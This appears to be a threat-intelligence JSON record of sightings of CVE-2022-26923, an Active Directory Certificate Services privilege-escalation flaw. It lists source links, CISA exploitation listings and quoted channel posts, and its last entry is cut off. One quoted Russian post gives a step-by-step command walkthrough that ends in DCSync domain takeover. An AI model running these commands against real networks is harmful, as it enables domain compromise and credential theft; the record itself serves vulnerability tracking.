{"vulnerability": "CVE-2022-26923", "sightings": [{"uuid": "1f944c8d-294d-418e-a2b5-630e553988c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "f18c025d-6b6d-4343-ae80-a9bf032c248d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971682", "content": "", "creation_timestamp": "2024-12-24T20:32:44.972401Z"}, {"uuid": "847c4abd-6029-495a-907a-71859923e9df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:45.000000Z"}, {"uuid": "1ee9613d-9f91-4254-9300-4164f1e68c44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "0e97418f-84f2-465d-aafc-160a474c987b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb", "content": "", "creation_timestamp": "2023-01-27T14:14:45.000000Z"}, {"uuid": "0e877ba7-6e01-4be4-be1b-c59a9d227b8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3llscglbqjk2z", "content": "", "creation_timestamp": "2025-04-02T02:06:15.074049Z"}, {"uuid": "b3f790a6-a7bf-4ed0-b1a1-afe9c7157d4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3llwp4g6y4e2x", "content": "", "creation_timestamp": "2025-04-03T20:03:52.291149Z"}, {"uuid": "f3cf0072-e413-4ae8-82e9-5223c8b44a53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3llwphvkqtn2r", "content": "", "creation_timestamp": "2025-04-03T20:10:17.356019Z"}, {"uuid": "4a364e8e-0e02-4a8f-980e-1873b576fec2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:36.000000Z"}, {"uuid": "04b0e18d-9100-445f-afb5-8caf14d2cd4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3llutdd7rme2r", "content": "", "creation_timestamp": "2025-04-03T02:13:59.571437Z"}, {"uuid": "f5255f80-060e-4d2e-967e-b4bf9a935f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-218112ab-f208e40627d05bf3", "content": "", "creation_timestamp": "2025-04-10T09:45:37.882296Z"}, {"uuid": "4fe15223-4ca1-4209-8b27-e2ad0b972e40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=801", "content": "", "creation_timestamp": "2022-05-11T04:00:00.000000Z"}, {"uuid": "43776dd1-9bbb-4a73-872f-de25323d4313", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3565", "content": "Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\ud83d\uddbc\ufe0f\n\n\u041a\u0440\u0430\u0442\u043a\u043e \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e\u0431 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u043c \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435.\n\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f:\n1. \u0414\u043e\u043c\u0435\u043d\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c;\n2. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u0432 \u0434\u043e\u043c\u0435\u043d;\n3. \u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0433\u043e \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 Machine;\n4. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u044b \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0431\u0443\u0434\u0435\u0442 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d, \u0442\u0430\u043a \u043a\u0430\u043a \u043c\u044b \u0431\u0443\u0434\u0435\u043c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0435\u043c \u043e\u0431\u044a\u0435\u043a\u0442\u0430).\n\n\ud83d\udc0d \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 Certipy, \u043a\u0440\u0430\u0442\u043a\u0430\u044f \u0441\u043f\u0440\u0430\u0432\u043a\u0430 \u043f\u043e \u043d\u0435\u0439 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u043d\u0438\u0436\u0435:\n# \u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430\npip install certipy-ad\n\n# \u0417\u0430\u043f\u0440\u043e\u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430\n# \u0434\u043b\u044f certipy-ad v3.0.0:\ncertipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName\n# \u0434\u043b\u044f certipy-ad v4.8.2:\ncertipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10\n\n# \u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044f \u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f NTLM-\u0445\u044d\u0448\u0430:\ncertipy auth -pfx username.pfx -dc-ip 10.10.10.10\n\u041d\u0430\u0447\u043d\u0435\u043c \u0430\u0442\u0430\u043a\u0443 \u0441 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 Impacket-Addcomputer\naddcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'\n\u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0434\u043b\u044f \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0448\u0430\u0431\u043b\u043e\u043d Machine) \u0438 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0443\u0435\u043c\u0441\u044f \u0441 \u043d\u0438\u043c:\ncertipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine\n\ncertipy auth -pfx testpc.pfx\n\u0414\u0430\u043b\u0435\u0435 \u0437\u0430\u0445\u043e\u0434\u0438\u043c \u043d\u0430 \u043b\u044e\u0431\u043e\u0439 \u0445\u043e\u0441\u0442 \u0434\u043e\u043c\u0435\u043d\u0430 \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u043c \u043c\u0435\u043d\u044f\u0442\u044c SPN \u0443 \u0437\u0430\u043f\u0438\u0441\u0438 \u043d\u0430\u0448\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430:\nGet-ADComputer TESTPC -properties dnshostname,serviceprincipalname\nSet-ADComputer TESTPC -DnsHostName DC.domain.local # \u0432\u0435\u0440\u043d\u0451\u0442 \u043e\u0448\u0438\u0431\u043a\u0443 \u0438\u0437-\u0437\u0430 \u0434\u0443\u0431\u043b\u0438\u0440\u0443\u044e\u0449\u0435\u0439\u0441\u044f SPN\nSet-ADComputer TESTPC -ServicePrincipalName @{} # \u043e\u0431\u043d\u0443\u043b\u044f\u0435\u043c SPN\nSet-ADComputer TESTPC -DnsHostName DC.domain.local\n\u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u043c\u0441\u044f \u043d\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u0445\u043e\u0441\u0442 \u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u043d\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442:\ncertipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine\n\u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0443\u0435\u043c\u0441\u044f \u0441 \u043f\u043e\u043b\u0447\u0435\u043d\u043d\u044b\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c NTLM \u0445\u044d\u0448 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430:\ncertipy auth -pfx dc.pfx\n...\n[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733\n\u0414\u0430\u043b\u0435\u0435 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c \u0430\u0442\u0430\u043a\u0443 DCSync \u043b\u044e\u0431\u044b\u043c \u0443\u0434\u043e\u0431\u043d\u044b\u043c \u0434\u043b\u044f \u043d\u0430\u0441 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u043c \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u043c \u0434\u043e\u043c\u0435\u043d:\nsecretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt\n\u0412\u0435\u043a\u0442\u043e\u0440 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u043a CVE-2022-26923 \u0441\u0440\u0435\u0434\u0435 Active Directory, \u043d\u043e \u0435\u0441\u043b\u0438 \u0432\u044b \u0432 \u043d\u0435\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c, \u0442\u043e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0431\u0443\u0434\u0435\u0442 \u0442\u0430\u043a \u0436\u0435 \u043f\u0440\u043e\u0441\u0442\u043e, \u043a\u0430\u043a, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0435\u0439 ZeroLogon!\ud83d\udd3a\n#\u043f\u0435\u043d\u0442\u0435\u0441\u0442 #AD", "creation_timestamp": "2024-01-12T07:00:52.000000Z"}, {"uuid": "fdb2f553-149c-4c77-b287-ab9e1085ba1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-26923", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/b7df40e3-bcb6-4eef-8ba5-b10ddbe05789", "content": "", "creation_timestamp": "2026-02-02T12:27:17.352054Z"}, {"uuid": "f4c76028-6a58-4b76-80ac-eb3303ccf36b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2166", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aWalkthrough on the exploitation of CVE-2022-26923, a vulnerability in AD Certificate Services\nURL\uff1ahttps://github.com/r1skkam/TryHackMe-CVE-2022-26923\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-12T02:37:16.000000Z"}, {"uuid": "e2aa5864-40d2-49d0-a032-5658ef7c1052", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/poxek/2374", "content": "#Windows #CVE\n\nActive Directory Domain Service Privilege Escalation Vulnerability\nCVE-2022-26923\n\n\u0421\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0432\u0435\u043a\u0442\u043e\u0440 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043d\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c (\u0438\u043b\u0438 \u043c\u0430\u0448\u0438\u043d\u0443) \u0434\u043e\u043c\u0435\u043d\u0430. \u0412 Active Directory \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u041d\u0415 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u044b \u0441\u043b\u0443\u0436\u0431\u044b \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0432, \u043d\u043e \u0435\u0441\u043b\u0438 \u043e\u043d\u0438 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u044b, \u0442\u043e \u043f\u0440\u0438 \u043d\u0430\u043b\u0438\u0447\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 \u043e\u043d\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043d\u0443\u0442\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432\u0435\u0441\u044c \u0434\u043e\u043c\u0435\u043d. \u0414\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u0443 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u043c\u043d\u043e\u0433\u043e \u0442\u0435\u043e\u0440\u0438\u0438.\u00a0", "creation_timestamp": "2022-09-02T12:16:15.000000Z"}, {"uuid": "d6ebae42-b115-4ad4-b498-c5b45630c8f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/poxek/2331", "content": "#Windows #CVE \n\nMicrosoft Windows Active Directory Certificate Services Improper Authorization Privilege Escalation Vulnerability\nCVE-2022-26923\n\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u043c\u0435\u0436\u043d\u044b\u043c \u0441 \u0441\u0435\u0442\u044c\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u043b\u0443\u0436\u0431\u0430\u0445 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0432 Active Directory. \u0414\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0432\u044b\u0434\u0430\u0447\u0438 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0432. \u0414\u043e\u0431\u0430\u0432\u0438\u0432 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u0437\u0430\u043f\u0440\u043e\u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442 \u0435\u043c\u0443 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0435 \u0434\u043e\u043c\u0435\u043d\u0430 \u0441 \u0432\u044b\u0441\u043e\u043a\u0438\u043c \u0443\u0440\u043e\u0432\u043d\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0439 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438.", "creation_timestamp": "2022-08-22T07:00:59.000000Z"}, {"uuid": "12fb1e0c-81f3-47a0-bff2-6b2565d64546", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "exploited", "source": "https://t.me/poxek/2362", "content": "#\u041f\u041e  #CVE\n\nCISA \u043f\u0440\u043e\u0441\u0438\u0442 \u0432\u0430\u0441 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c \u044d\u0442\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\nCVE-2022-22536, CVE-2022-32893, CVE-2022-32894, CVE-2022-2856, CVE-2022-21971, CVE-2022-26923, CVE-2017-15944\n\nCISA (\u0410\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u043e \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0421\u0428\u0410) \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u043e \u0441\u0432\u043e\u0439 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0434\u043e\u0431\u0430\u0432\u0438\u0432 \u0432 \u043d\u0435\u0433\u043e \u0441\u0435\u043c\u044c \u043d\u043e\u0432\u044b\u0445 \u043f\u043e\u0437\u0438\u0446\u0438\u0439. \u042d\u0442\u0438 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Apple, Google, Microsoft, Palo Alto Networks \u0438 SAP.\u00a0", "creation_timestamp": "2022-08-25T18:06:49.000000Z"}, {"uuid": "d39c2d56-cc79-479d-bbda-69f014cb4040", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/poxek/2448", "content": "#\u041d\u043e\u0432\u043e\u0441\u0442\u0438\n\nMetasploit Weekly Wrap-Up\n\nThis week Metasploit has a new ICPR Certificate Management module from Oliver Lyak and our very own Spencer McIntyre, which can be utilized for issuing certificates via Active Directory Certificate Services. It has the capability to issue certificates which is useful in a few contexts including persistence, ESC1 and as a primitive necessary for exploiting CVE-2022-26923. Resulting in the PFX certificate file being stored to loot and is encrypted using a blank password.", "creation_timestamp": "2022-09-05T11:00:05.000000Z"}, {"uuid": "ffe61189-feaa-4a8c-bcd9-ae9d8cf52ed2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2188", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aAn improved Proof of Concept for CVE-2022-1388 w/ Interactive Shell.        No reverse tcp required!\nURL\uff1ahttps://github.com/LudovicPatho/CVE-2022-26923_AD-Certificate-Services\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-14T20:49:13.000000Z"}, {"uuid": "a2df620d-a5d1-4415-b96a-b1b87ea4fa47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/cKure/9520", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Active Directory Domain Privilege Escalation (CVE-2022\u201326923).\n\nhttps://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4", "creation_timestamp": "2022-05-15T06:14:26.000000Z"}, {"uuid": "c9c003ea-dbab-466f-91d1-0c254c2847c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/10277", "content": "\u200aCybercriminals Evolve Social Engineering Tactics, Exploit CVE-2022-26923 in Sophisticated Campaign\n\nhttps://securityonline.info/cybercriminals-evolve-social-engineering-tactics-exploit-cve-2022-26923-in-sophisticated-campaign/", "creation_timestamp": "2024-08-17T10:33:58.000000Z"}, {"uuid": "7c5d3f2f-bedb-4108-a037-8b44da3a0aff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/cyberbannews_ir/6477", "content": "\u200d \ud83d\uded1\u0627\u0641\u0632\u0648\u062f\u0647 \u0634\u062f\u0646 7 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062c\u062f\u06cc\u062f \u0628\u0647 \u0641\u0647\u0631\u0633\u062a \u0628\u0627\u06af \u0647\u0627\u06cc CISA\n\n\u0622\u0698\u0627\u0646\u0633 